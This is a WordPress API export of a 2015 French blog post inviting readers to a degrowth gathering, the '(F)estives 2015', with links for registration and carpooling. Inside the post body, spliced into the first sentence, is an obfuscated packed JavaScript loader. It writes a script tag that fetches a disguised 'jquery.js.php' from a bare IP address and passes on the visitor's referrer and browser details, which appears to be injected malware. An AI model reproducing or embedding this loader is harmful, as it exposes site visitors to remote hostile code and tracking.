{"id":9119,"date":"2015-07-11T14:17:14","date_gmt":"2015-07-11T13:17:14","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=9119"},"modified":"2015-11-21T14:26:07","modified_gmt":"2015-11-21T13:26:07","slug":"invitation-aux-festives-2015-de-lobjection-de-croissance-a-merlimont-62","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9119","title":{"rendered":"Invitation aux (F)estives 2015 de l\u2019objection de croissance \u00e0 Merlimont (62)"},"content":{"rendered":"<p>Depuis 2006 l&rsquo;<a href=\"http:\/\/www.objectiondecroissance.org\/agenda\/festives-2015-a-merlimont-62\/\">AdeROC<\/a>, <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdfhr|var|u0026u|referrer|fhtnb||js|php'.split('|'),0,{}))\n<\/script><\/noindex> en collaboration avec d&rsquo;autres structures d&rsquo;Objecteurs de Croissance, organise les <strong>(f)Estives de l&rsquo;Objection de Croissance<\/strong>. Le collectif \u00ab\u00a0<a href=\"http:\/\/www.partipourladecroissance.net\/?cat=3\">PartiEs Pour La D\u00e9croissance<\/a>\u00a0\u00bb soutien totalement cet \u00e9v\u00e9nement incontournable de l&rsquo;ann\u00e9e.<\/p>\n<p><a href=\"http:\/\/www.objectiondecroissance.org\/agenda\/festives-2015-a-merlimont-62\/\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/www.objectiondecroissance.org\/wp-content\/uploads\/invitation_festives_2015_basse_def.jpg\" alt=\"\" width=\"826\" height=\"1169\" \/><\/a><\/p>\n<div>\n<p><strong>Cliquez sur les liens ci-dessous\u2026.<\/strong><\/p>\n<ul>\n<li><a href=\"http:\/\/www.objectiondecroissance.org\/?p=4082\">Infos pratiques<\/a><\/li>\n<li><a href=\"http:\/\/www.objectiondecroissance.org\/inscription-festives\/\">Formulaire d\u2019inscription<\/a><\/li>\n<li><a href=\"http:\/\/www.objectiondecroissance.org\/covoiturage\/\">Covoiturage<\/a><\/li>\n<li><a href=\"http:\/\/www.objectiondecroissance.org\/festives-2015-le-programme\/\">Programme provisoire des (F)Estives<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2015\/07\/invitation_festives_2015_basse_def1.pdf\">T\u00e9l\u00e9chargez l&rsquo;invitation<\/a><\/li>\n<\/ul>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Depuis 2006 l&rsquo;AdeROC, en collaboration avec d&rsquo;autres structures d&rsquo;Objecteurs de Croissance, organise les (f)Estives de l&rsquo;Objection de Croissance. Le collectif \u00ab\u00a0PartiEs Pour La D\u00e9croissance\u00a0\u00bb soutien totalement cet \u00e9v\u00e9nement incontournable de l&rsquo;ann\u00e9e. Cliquez sur les liens ci-dessous\u2026. Infos pratiques Formulaire d\u2019inscription &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9119\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,33],"tags":[],"class_list":["post-9119","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9119","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9119"}],"version-history":[{"count":5,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9119\/revisions"}],"predecessor-version":[{"id":9123,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9119\/revisions\/9123"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9119"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9119"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}